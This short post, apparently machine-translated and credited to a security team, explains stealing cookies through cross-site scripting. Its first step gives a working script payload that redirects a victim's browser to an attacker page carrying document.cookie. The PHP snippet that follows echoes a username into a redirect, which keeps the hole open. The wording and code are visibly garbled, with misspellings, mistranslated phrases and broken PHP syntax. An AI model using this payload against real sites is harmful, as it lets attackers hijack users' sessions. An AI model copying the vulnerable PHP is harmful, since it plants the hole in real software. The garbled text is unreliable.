Exploring and using xss

My Forum will be open soon, so I'm a little excited !!, Let's take a look at the following !!
Background, exploring and using XSS is conducive to the learning atmosphere!
 
XSS: Cross Site Spripting-
-
General attack steps:
 
1 we generally like to send the HTTP link of the hidden website script to the target: http://www.bkjia.com/post. php? User = <script> document. location = "http://www.bkjia.com/get. php? Cookie = "+ document. cookie; </script>
1
2: The target user opens a website with xss vulnerabilities. during login, the HTTP link we sent to hide cross-site scripts is opened.
 
3: The 90se with xss executes the http link and displays the user value of the url parameter, so that the cross-site script is executed.
 
4: XSS excludes the target user's browser address to our page: http://www.bkjia.com/get. php, the cookie data of the target user's browser is treated as get. php web page url parameter cookie: http://www.bkjia.com/get. php? Cokie = document. cookie so that we can get the target cookie
 
Simple Mining: See the following code:
If ($ match_count)
{Setcookie ("uername", $ _ POST ["username"], time () + 30*24*60*60) // Save the value of the username field to the cookie
Setcookie ("uername", $ _ POST ["username"], time () + 30*24*60*60) // Save the value of the password field to the cookie
Mysql_free_result ($ result );
Mysql_close ($ link );
// Jump to the page
Header ("Location: http // localhost/balck/black. php? User ="
$ _ POST ["username"]) // After the user logs on, the current page is redirected to black. php. The back. php file has the url parameter user, and the user value is the account of the visitor.
}
Else
{
 
Header ("Location: http: //. $ _ SERVER [" HTTP_HOST "]"
$ _ SERVER ["SCRIPT_NAME"]);

From: 90 sacret Team Information Security Team